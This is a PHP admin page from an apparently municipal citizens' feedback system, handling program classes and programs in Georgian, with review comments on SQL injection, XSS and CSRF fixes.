Current File : /var/www/kharagauli_new/Citizens_feedback/admin/pages/programs.php
<div class="page-container" id="page-container"> 
    <!-- BEGIN MAIN CONTENT -->
    <div class="main_content">
        <!-- BEGIN WRAPPER -->
        <div class="content-wrapper" style="padding-top: 80px; padding-bottom: 80px">
<?php
if($_SESSION['E_'.$Action]==1)
if($Action=='programs'){ // ==================== Options RequestTimeInterval
	
	


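if(isset($_GET['DelProgClass'])){
	// Delete one program class together with its programs and the answers recorded for it.
	// NOTE(review): this destructive action is driven by a plain GET parameter and no
	// anti-CSRF token is checked in this file; confirm the including script enforces one,
	// otherwise move the delete to a POST request that carries a per-session token.
	$PCID=(int)$_GET['DelProgClass'];
	// The int cast keeps the concatenated SQL numeric. A non-numeric parameter casts to 0,
	// which would otherwise run the deletes against ClassID=0, so only positive ids proceed.
	if($PCID>0){
		// Dependent rows first, then the class, in one transaction so a failure part-way
		// does not leave a half-deleted class (effective only on a transactional storage
		// engine; TODO confirm the table engine).
		mysqli_begin_transaction($baza);
		$deleted=mysqli_query($baza,'delete from cf_Answers where ClassID='.$PCID)
			&& mysqli_query($baza,'delete from cf_Programs where ClassID='.$PCID)
			&& mysqli_query($baza,'delete from cf_ProgramClasses where ID='.$PCID);
		if($deleted){
			mysqli_commit($baza);
		}else{
			// Keep the database detail in the server log instead of the page.
			error_log('programs.php: deleting program class '.$PCID.' failed: '.mysqli_error($baza));
			mysqli_rollback($baza);
		}
	}
	}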
	
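if(isset($_POST['ClassName']) && is_string($_POST['ClassName'])){
	// Save handler for the class form: ClassID 0 creates a class (unless the name is
	// already taken), any other id updates that row.
	$ClassName=$_POST['ClassName'];
	$ClassID=(int)(isset($_POST['ClassID'])?$_POST['ClassID']:0);
	// Browsers omit unchecked checkboxes from the POST body, so presence alone is the flag.
	$ShowInProgramList=isset($_POST['ShowInProgramList'])?1:0;
	$CheckPersonalID=isset($_POST['CheckPersonalID'])?1:0;
	$ShowOnlyUsedPrograms=isset($_POST['ShowOnlyUsedPrograms'])?1:0;

	// ClassName is free text from the request. It used to be concatenated into the SQL
	// string (SQL injection); every value is now bound as a statement parameter.
	$ok=false;
	$dbError='';
	if($ClassID==0){
		$duplicate=false;
		$stmt=mysqli_prepare($baza,'select ID from cf_ProgramClasses where Name=?');
		if($stmt){
			mysqli_stmt_bind_param($stmt,'s',$ClassName);
			if(mysqli_stmt_execute($stmt)){
				mysqli_stmt_store_result($stmt);
				$duplicate=mysqli_stmt_num_rows($stmt)>0;
				$ok=true;
			}else{
				$dbError=mysqli_stmt_error($stmt);
			}
			mysqli_stmt_close($stmt);
		}else{
			$dbError=mysqli_error($baza);
		}

		if($ok && $duplicate){
			info('ასეთი კლასი უკვე არსებობს');
		}elseif($ok){
			$ok=false;
			$stmt=mysqli_prepare($baza,'insert into cf_ProgramClasses (Name,ShowInProgramList, CheckPersonalID, ShowOnlyUsedPrograms) values (?,?,?,?)');
			if($stmt){
				mysqli_stmt_bind_param($stmt,'siii',$ClassName,$ShowInProgramList,$CheckPersonalID,$ShowOnlyUsedPrograms);
				$ok=mysqli_stmt_execute($stmt);
				if(!$ok) $dbError=mysqli_stmt_error($stmt);
				mysqli_stmt_close($stmt);
			}else{
				$dbError=mysqli_error($baza);
			}
		}
	}else{ // ClassID>0
		$stmt=mysqli_prepare($baza,'update cf_ProgramClasses set Name=?, ShowInProgramList=?, ShowOnlyUsedPrograms=?, CheckPersonalID=? where ID=?');
		if($stmt){
			mysqli_stmt_bind_param($stmt,'siiii',$ClassName,$ShowInProgramList,$ShowOnlyUsedPrograms,$CheckPersonalID,$ClassID);
			$ok=mysqli_stmt_execute($stmt);
			if(!$ok) $dbError=mysqli_stmt_error($stmt);
			mysqli_stmt_close($stmt);
		}else{
			$dbError=mysqli_error($baza);
		}
	}
	if(!$ok){
		// The old code passed the failed result (false) to mysqli_error(), which needs the
		// connection, so the real error was never reported. Log the detail server-side and
		// show only a generic message.
		error_log('programs.php: saving program class failed: '.$dbError);
		die('Database error');
	}
	}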
	
// Defaults for the class form: no class selected, empty name, "show in list" and
// "check personal ID" on, "only used programs" off. ?ID= selects a class to edit;
// the int cast keeps the value numeric for the queries that concatenate it later.
$ClassID=isset($_GET['ID'])?(int)$_GET['ID']:0;
$ClassName='';
$ShowInProgramList=1;
$CheckPersonalID=1;
$ShowOnlyUsedPrograms=0;
	?>
<div class="inlineDiv">
	<table border="1" cellspacing="0" cellpadding="5" class="normal PCTable" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td colspan="2">კლასის დასახელება</td><td colspan="10"></td></thead>
		<tbody class="sortable">
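	<?php
	// One table row per program class, in stored order. While walking the rows, the class
	// selected through $ClassID is copied into the edit-form variables.
	$ptk=mysqli_query($baza,'select * from cf_ProgramClasses order by Pos');
	// A failed query yields false; skip the loop instead of passing false to the fetch call.
	while($ptk && ($row=mysqli_fetch_array($ptk,MYSQLI_ASSOC))){
		if($ClassID==$row['ID']) {
			$ClassName=$row['Name'];
			$ShowInProgramList=$row['ShowInProgramList'];
			$CheckPersonalID=$row['CheckPersonalID'];
			$ShowOnlyUsedPrograms=$row['ShowOnlyUsedPrograms'];
			}
		// Name is free text saved by the class form on this page; it and the id placed in an
		// attribute are HTML-encoded so stored markup cannot execute in the admin's browser.
	?>
		<tr num="<?=htmlspecialchars((string)$row['ID'],ENT_QUOTES,'UTF-8')?>" <?=$row['ID']==$ClassID?'class="selected"':''?>>
			<td class="handle"></td>
			<td class="SelectedTD2"><?=htmlspecialchars((string)$row['Name'],ENT_QUOTES,'UTF-8')?></td> 
			<td><span class="delete"></span></td>
			<td><span class="activeIcon <?=$row['Active']?'active':''?>"></span></td>
			<td><span class="ShowInProgramListIcon <?=$row['ShowInProgramList']?'active':''?>"></span></td>
			<td><span class="CheckPersonalIDIcon <?=$row['CheckPersonalID']?'active':''?>"></span></td>
			<td><span class="ShowOnlyUsedProgramsIcon <?=$row['ShowOnlyUsedPrograms']?'active':''?>"></span></td>
			<td><span class="archiveIcon <?=$row['Archive']?'active':''?>"></span></td>
		</tr>
		<?php } ?>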
		</tbody>
	</table>
<script>
$('.PCTable .sortable').sortable({
	handle:'.handle',
	// When a drag finishes, read the rows' num attributes in their new on-screen order
	// and post them to interactive.php as setClassesSort.
	// NOTE(review): the request carries no anti-CSRF token here; confirm interactive.php
	// checks the session and the caller's permission before changing anything.
	stop:function(){
		var rows=$(this).closest('tbody').children('tr').toArray();
		var order=[];
		for(var i=0;i<rows.length;i++){
			order.push($(rows[i]).attr('num'));
		}
		console.log(order);
		var request=$.ajax({
			url:'interactive.php',
			type:'post',
			dataType:'json',
			data:{f:'setClassesSort',ss:order}
		});
		request.done(function(data){
			console.log('DONE ',data);
		});
		request.fail(function(data){
			console.log('FAIL ',data);
		});
		console.log('Stop');
	}
});
$('.PCTable span.activeIcon').on('click',function(){
	// Flip the icon immediately, then send the new state for this row to interactive.php.
	// The icon is not reverted if the request fails; the outcome is only logged.
	var icon=$(this);
	icon.toggleClass('active');
	var payload={
		f:'setClassesActive',
		num:icon.closest('tr').attr('num'),
		active:icon.hasClass('active')?1:0
	};
	$.ajax({url:'interactive.php',type:'post',dataType:'json',data:payload})
		.done(function(data){console.log('done=',data);})
		.fail(function(data){console.log('fail=',data);});
});
	
$('.PCTable span.archiveIcon').on('click',function(){
	// Flip the archive icon immediately, then send the new state for this row to
	// interactive.php as setArchiveActive. Failures are only logged to the console.
	var icon=$(this);
	icon.toggleClass('active');
	var payload={
		f:'setArchiveActive',
		num:icon.closest('tr').attr('num'),
		active:icon.hasClass('active')?1:0
	};
	$.ajax({url:'interactive.php',type:'post',dataType:'json',data:payload})
		.done(function(data){console.log('done=',data);})
		.fail(function(data){console.log('fail=',data);});
});
$('.PCTable span.delete').on('click',function(){
	// Build the DelProgClass link for the clicked row and hand it, with the warning text,
	// to confirmMessage (defined elsewhere; presumably it navigates there once confirmed).
	var rowId=$(this).closest('tr').attr('num');
	var target='?Action=<?=$Action?>&DelProgClass='+rowId;
	confirmMessage('პროგრამის კლასის და მასში შემავალი ყველა პროექტის და მათი სტატისტიკის წაშლა',target);
});
</script>

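	<?php /* Create/edit form for a program class. ClassName can hold text that came from the request or the database, so it is HTML-encoded before being placed in the value attribute; ClassID is an integer by the time it is printed. */ ?>
	<form action="?Action=<?=$Action?>" method="post" enctype="multipart/form-data"><input type="hidden" name="ClassID" value="<?=(int)$ClassID?>">
		<table border="1" cellspacing="0" cellpadding="5" class="normal" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td><?=$ClassID>0?'კლასის რედაქტირება <a href="?Action='.$Action.'">ახალი კლასი</a>':'ახალი კლასი'?></td></thead>
		<tr><td><input type="text" name="ClassName" value="<?=htmlspecialchars((string)$ClassName,ENT_QUOTES,'UTF-8')?>"></td></tr>
		<tr><td><label ><input type="checkbox" name="ShowInProgramList" <?=$ShowInProgramList==1?'checked':''?>> - გამოჩნდეს პროგრამების სიაში</label></td></tr>
		<tr><td><label ><input type="checkbox" name="CheckPersonalID" <?=$CheckPersonalID==1?'checked':''?>> - შემოწმდეს პირადი ნომერი</label></td></tr>
		<tr><td><label ><input type="checkbox" name="ShowOnlyUsedPrograms" <?=$ShowOnlyUsedPrograms==1?'checked':''?>> - გამოჩნდეს მხოლოდ გამოყენებული პროგრამები</label></td></tr>
		<tr><td align="center" colspan="10"><input type="submit"></td>
		</table>
	</form>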
</div>
	
	
	
	
<?php
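if(isset($_GET['DelProgram'])){
	// Delete one program together with the answers recorded for it.
	// NOTE(review): this destructive action is driven by a plain GET parameter and no
	// anti-CSRF token is checked in this file; confirm the including script enforces one,
	// otherwise move the delete to a POST request that carries a per-session token.
	$PrID=(int)$_GET['DelProgram'];
	// The int cast keeps the concatenated SQL numeric. A non-numeric parameter casts to 0,
	// which would otherwise run the deletes against id 0, so only positive ids proceed.
	if($PrID>0){
		// Answers first, then the program, in one transaction so a failure part-way does
		// not leave answers without their program (effective only on a transactional
		// storage engine; TODO confirm the table engine).
		mysqli_begin_transaction($baza);
		$deleted=mysqli_query($baza,'delete from cf_Answers where ProgramID='.$PrID)
			&& mysqli_query($baza,'delete from cf_Programs where ID='.$PrID);
		if($deleted){
			mysqli_commit($baza);
		}else{
			// Keep the database detail in the server log instead of the page.
			error_log('programs.php: deleting program '.$PrID.' failed: '.mysqli_error($baza));
			mysqli_rollback($baza);
		}
	}
	}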
	
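if(isset($_POST['ProgramID'])){
	// Save handler for the program form: ProgramID 0 inserts a program (unless the class
	// already has one with that name), any other id updates that row.
	// Missing or non-string fields are read as '' so a malformed request raises no notices.
	$postText=function($key){
		return (isset($_POST[$key]) && is_string($_POST[$key]))?$_POST[$key]:'';
	};
	$ProgramID=(int)$postText('ProgramID');
	$ProgramName=$postText('ProgramName');
	$ProgramCode=$postText('ProgramCode');
	$ProgramBudjet=(int)$postText('ProgramBudjet');
	$ProgramDescription=$postText('ProgramDescription');
	$ProgramImplementingService=$postText('ProgramImplementingService');
	$ProgramExpectedResult=$postText('ProgramExpectedResult');
	// The questionnaire field is an id taken from the select box; bind it as an integer.
	$ProgramQuestionnaire=(int)$postText('ProgramQuestionnaire');
	$ClassID=(int)$postText('ClassID');
	unset($postText);

	// The text fields used to be concatenated into the SQL string (SQL injection); every
	// value is now bound as a statement parameter.
	$ok=false;
	$dbError='';
	if($ProgramID==0){
		$duplicate=false;
		$stmt=mysqli_prepare($baza,'select ID from cf_Programs where ClassID=? and Name=?');
		if($stmt){
			mysqli_stmt_bind_param($stmt,'is',$ClassID,$ProgramName);
			if(mysqli_stmt_execute($stmt)){
				mysqli_stmt_store_result($stmt);
				$duplicate=mysqli_stmt_num_rows($stmt)>0;
				$ok=true;
			}else{
				$dbError=mysqli_stmt_error($stmt);
			}
			mysqli_stmt_close($stmt);
		}else{
			$dbError=mysqli_error($baza);
		}

		if($ok && $duplicate){
			info('ასეთი პროგრამა უკვე არსებობს');
		}elseif($ok){
			$ok=false;
			$stmt=mysqli_prepare($baza,'insert into cf_Programs (Name,ClassID, Code, Budjet, Description, ImplementingService, ExpectedResult, QuestionnaireID) values (?,?,?,?,?,?,?,?)');
			if($stmt){
				mysqli_stmt_bind_param($stmt,'sisisssi',$ProgramName,$ClassID,$ProgramCode,$ProgramBudjet,$ProgramDescription,$ProgramImplementingService,$ProgramExpectedResult,$ProgramQuestionnaire);
				$ok=mysqli_stmt_execute($stmt);
				if(!$ok) $dbError=mysqli_stmt_error($stmt);
				mysqli_stmt_close($stmt);
			}else{
				$dbError=mysqli_error($baza);
			}
		}
	}else{ // ProgramID>0
		$stmt=mysqli_prepare($baza,'update cf_Programs set Name=?, ClassID=?, Code=?, Budjet=?, Description=?, ImplementingService=?, ExpectedResult=?, QuestionnaireID=? where ID=?');
		if($stmt){
			mysqli_stmt_bind_param($stmt,'sisisssii',$ProgramName,$ClassID,$ProgramCode,$ProgramBudjet,$ProgramDescription,$ProgramImplementingService,$ProgramExpectedResult,$ProgramQuestionnaire,$ProgramID);
			$ok=mysqli_stmt_execute($stmt);
			if(!$ok) $dbError=mysqli_stmt_error($stmt);
			mysqli_stmt_close($stmt);
		}else{
			$dbError=mysqli_error($baza);
		}
	}
	if(!$ok){
		// The old code passed the failed result (false) to mysqli_error() and printed the
		// full SQL text to the browser. Log the detail server-side and show only a generic
		// message.
		error_log('programs.php: saving program failed: '.$dbError);
		die('Database error');
	}
	}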
	

		
	// Start from an empty program form; the fields are filled below when ?PrID= names a
	// program that belongs to the current class.
	$ProgramID=0;
	$ProgramName=$ProgramCode=$ProgramBudjet=$ProgramDescription='';
	$ProgramImplementingService=$ProgramExpectedResult=$ProgramQuestionnaire='';

if(isset($_GET['PrID'])){
	$PrID=(int)$_GET['PrID'];
	// Both ids are integers (PrID is cast here, ClassID earlier in this file), so the
	// concatenation cannot change the shape of the query.
	$ptk=mysqli_query($baza,'select * from cf_Programs where ClassID='.$ClassID.' and ID='.$PrID);
	$row=mysqli_fetch_array($ptk,MYSQLI_ASSOC);
	if($row){
		$ProgramQuestionnaire=$row['QuestionnaireID'];
		$ProgramExpectedResult=$row['ExpectedResult'];
		$ProgramImplementingService=$row['ImplementingService'];
		$ProgramDescription=$row['Description'];
		$ProgramBudjet=$row['Budjet'];
		$ProgramCode=$row['Code'];
		$ProgramName=$row['Name'];
		$ProgramID=$row['ID'];
	}
}
	
?>
<div class="inlineDiv">
	<table border="1" cellspacing="0" cellpadding="5" class="normal PrTable" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td></td><td>კოდი</td><td colspan="2">პროგრამის დასახელება</td><td colspan="10"></td></thead>
		<tbody class="sortable">
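	<?php
	// One table row per program of the selected class, in stored order. While walking the
	// rows, the program selected through $ProgramID is copied into the edit-form variables.
	// ClassID is an integer (cast earlier in this file), so concatenating it is safe.
	$ptk=mysqli_query($baza,'select * from cf_Programs where ClassID='.$ClassID.' order by Pos');
	// A failed query yields false; skip the loop instead of passing false to the fetch call.
	while($ptk && ($row=mysqli_fetch_array($ptk,MYSQLI_ASSOC))){
			if($ProgramID==$row['ID']) {
				$ProgramName=$row['Name'];
				$ProgramCode=$row['Code'];
				$ProgramBudjet=$row['Budjet'];
				$ProgramDescription=$row['Description'];
				$ProgramImplementingService=$row['ImplementingService'];
				$ProgramExpectedResult=$row['ExpectedResult'];
				$ProgramQuestionnaire=$row['QuestionnaireID'];
				}
			// Code and Name are free text saved by the program form on this page; they and the
			// ids placed in attributes are HTML-encoded so stored markup cannot execute in the
			// admin's browser.
			?>
		<tr num="<?=htmlspecialchars((string)$row['ID'],ENT_QUOTES,'UTF-8')?>" <?=$row['ID']==$ProgramID?'class="selected"':''?>>
			<td class="handle<?=$row['QuestionnaireID']>0?' hasQuestionaire':''?>"></td>
			<td class="Code"><?=htmlspecialchars((string)$row['Code'],ENT_QUOTES,'UTF-8')?></td>
			<td class="SelectedTD2" href="ID=<?=(int)$ClassID?>&PrID=<?=htmlspecialchars((string)$row['ID'],ENT_QUOTES,'UTF-8')?>"><?=htmlspecialchars((string)$row['Name'],ENT_QUOTES,'UTF-8')?></td>
			<td><span class="delete"></span></td>
			<td><span class="activeIcon <?=$row['Active']?'active':''?>"></span></td>
		</tr>
		<?php } ?>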
		</tbody>
	</table>
<style>
	.Code{white-space: nowrap;}
</style>
<script>
$('.PrTable .sortable').sortable({
	handle:'.handle',
	// When a drag finishes, read the rows' num attributes in their new on-screen order
	// and post them to interactive.php as setProgramSort.
	// NOTE(review): the request carries no anti-CSRF token here; confirm interactive.php
	// checks the session and the caller's permission before changing anything.
	stop:function(){
		var rows=$(this).closest('tbody').children('tr').toArray();
		var order=[];
		for(var i=0;i<rows.length;i++){
			order.push($(rows[i]).attr('num'));
		}
		console.log(order);
		var request=$.ajax({
			url:'interactive.php',
			type:'post',
			dataType:'json',
			data:{f:'setProgramSort',ss:order}
		});
		request.done(function(data){
			console.log('DONE ',data);
		});
		request.fail(function(data){
			console.log('FAIL ',data);
		});
		console.log('Stop');
	}
});
$('.PrTable span.activeIcon').on('click',function(){
	// Flip the icon immediately, then send the new state for this program row to
	// interactive.php as setProgramActive. Failures are only logged to the console.
	var icon=$(this);
	icon.toggleClass('active');
	var payload={
		f:'setProgramActive',
		num:icon.closest('tr').attr('num'),
		active:icon.hasClass('active')?1:0
	};
	$.ajax({url:'interactive.php',type:'post',dataType:'json',data:payload})
		.done(function(data){console.log('done=',data);})
		.fail(function(data){console.log('fail=',data);});
});
$('.PrTable span.delete').on('click',function(){
	// Build the DelProgram link for the clicked row and hand it, with the warning text,
	// to confirmMessage (defined elsewhere; presumably it navigates there once confirmed).
	var rowId=$(this).closest('tr').attr('num');
	var target='?Action=<?=$Action?>&DelProgram='+rowId;
	confirmMessage('პროგრამის და მასში შემავალი სტატისტიკის წაშლა',target);
});
</script>
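<?php
		// The program form is only offered once a class is selected (ClassID > 0).
		// Every Program* value may hold text read back from the database or the request, so
		// each one is HTML-encoded for its attribute or textarea context before output.
		if($ClassID>0){
		?>
	<form action="?Action=<?=$Action?>" method="post" enctype="multipart/form-data" class="PrForm">
		<input type="hidden" name="ProgramID" value="<?=(int)$ProgramID?>">
		<input type="hidden" name="ClassID" value="<?=(int)$ClassID?>">
		<table border="1" cellspacing="0" cellpadding="5" class="normal" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td><?=$ProgramID>0?'პროგრამის რედაქტირება <a href="?Action='.$Action.'&ID='.(int)$ClassID.'">ახალი პროგრამა</a>':'ახალი პროგრამა'?></td></thead>
		<tr><td>დასახელება<br><input type="text" name="ProgramName" value="<?=htmlspecialchars((string)$ProgramName,ENT_QUOTES,'UTF-8')?>"></td></tr>
			<tr><td>კოდი<br><input type="text" name="ProgramCode" value="<?=htmlspecialchars((string)$ProgramCode,ENT_QUOTES,'UTF-8')?>"></td></tr>
			<tr><td>დაფინანსება (₾)<br><input type="text" name="ProgramBudjet" value="<?=htmlspecialchars((string)$ProgramBudjet,ENT_QUOTES,'UTF-8')?>"></td></tr>
			<tr><td>აღწერა<br><textarea name="ProgramDescription" ><?=htmlspecialchars((string)$ProgramDescription,ENT_QUOTES,'UTF-8')?></textarea></td></tr>
			<tr><td>განმახორციელებელი სამსახური<br><input type="text" name="ProgramImplementingService" value="<?=htmlspecialchars((string)$ProgramImplementingService,ENT_QUOTES,'UTF-8')?>"></td></tr>
			<tr><td>მოსალოდნელი  შედეგი<br><input type="text" name="ProgramExpectedResult" value="<?=htmlspecialchars((string)$ProgramExpectedResult,ENT_QUOTES,'UTF-8')?>"></td></tr>
			<tr><td>კითხვარი<br>
				<select name="ProgramQuestionnaire">
					<option value="0">-</option>
					<?php
			// One option per questionnaire, sorted by name; the one stored on the program is
			// preselected. A failed query yields false, in which case no options are printed.
			$ptk=mysqli_query($baza,'select * from cf_Questionnaire order by Name');
			while($ptk && ($row=mysqli_fetch_array($ptk,MYSQLI_ASSOC)))
				echo '<option value="'.htmlspecialchars((string)$row['ID'],ENT_QUOTES,'UTF-8').'" '.($row['ID']==$ProgramQuestionnaire?'selected':'').'>'.htmlspecialchars((string)$row['Name'],ENT_QUOTES,'UTF-8').'</option>';
			?>
				</select>
				</td></tr>
		<tr><td align="center" colspan="10"><input type="submit"></td>
		</table>
	</form>
		<?php } ?>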
</div>		
			
	<?php  } ?>
</div> 	</div> 	</div> 
